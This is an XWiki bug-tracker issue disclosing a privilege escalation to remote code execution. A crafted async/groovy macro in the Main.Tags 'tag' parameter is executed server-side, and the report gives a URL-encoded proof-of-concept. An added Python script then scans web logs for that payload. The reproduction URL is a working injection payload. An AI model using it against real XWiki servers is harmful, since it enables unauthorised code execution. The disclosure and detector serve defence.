  1. XWiki Platform
  2. XWIKI-19747

Privilege escalation (PR) with view rights on Main.Tags

Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      Open <server>/xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

      Expected result:

      Tags for

      {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}
      

      are displayed.

      Actual result:

      Tags for hello from groovy! are displayed.

      This demonstrates a privilege escalation attack from view rights on Main.Tags to programming rights. This is also a remote code execution attack.

      This most likely affects all versions of XWiki that contain the async macro (version 11.6RC1 and later), which allows circumventing the script macro nesting protection. Similar attacks might also be possible with the job macro; this is to be verified.
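
An added example, not part of the original report or of XWiki's code: a log check that flags requests for Main/Tags whose `tag` parameter decodes to XWiki macro syntax, as in the reproduction URL above. The combined log format, the constructed sample lines and all function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Opening marker of an XWiki macro, e.g. {{groovy}} or {{async ...}}
MACRO_OPEN = re.compile(r"\{\{\s*([A-Za-z][\w.-]*)")

def fully_decode(value, rounds=3):
    """Strip extra percent-encoding layers that proxies or loggers may add."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def macros_in_tag_param(log_line):
    """Macro names in the `tag` parameter of a request for Main/Tags."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if "/Main/Tags" not in unquote(url.path):
        return []
    names = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("tag", []):
        names += [n.lower() for n in MACRO_OPEN.findall(fully_decode(raw))]
    return names

def scan(lines):
    """Return (line_number, macro_names) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        names = macros_in_tag_param(line)
        if names:
            hits.append((number, names))
    return hits

# Constructed sample log (combined format); line 2 carries the URL from the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2022:10:00:00 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=release-notes HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2022:10:00:05 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 5230',
    '203.0.113.9 - - [01/Jan/2022:10:00:09 +0000] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=%257B%257Bgroovy%257D%257D1%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 5130',
    '203.0.113.5 - - [01/Jan/2022:10:00:12 +0000] "GET /xwiki/bin/view/Sandbox/WebHome?tag=%7B%7Bgroovy%7D%7D HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: macro syntax in tag parameter: {names}")
```

A hit only shows that macro syntax reached the `tag` parameter; whether it was executed depends on the XWiki version serving the request.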

            People

              MichaelHamann Michael Hamann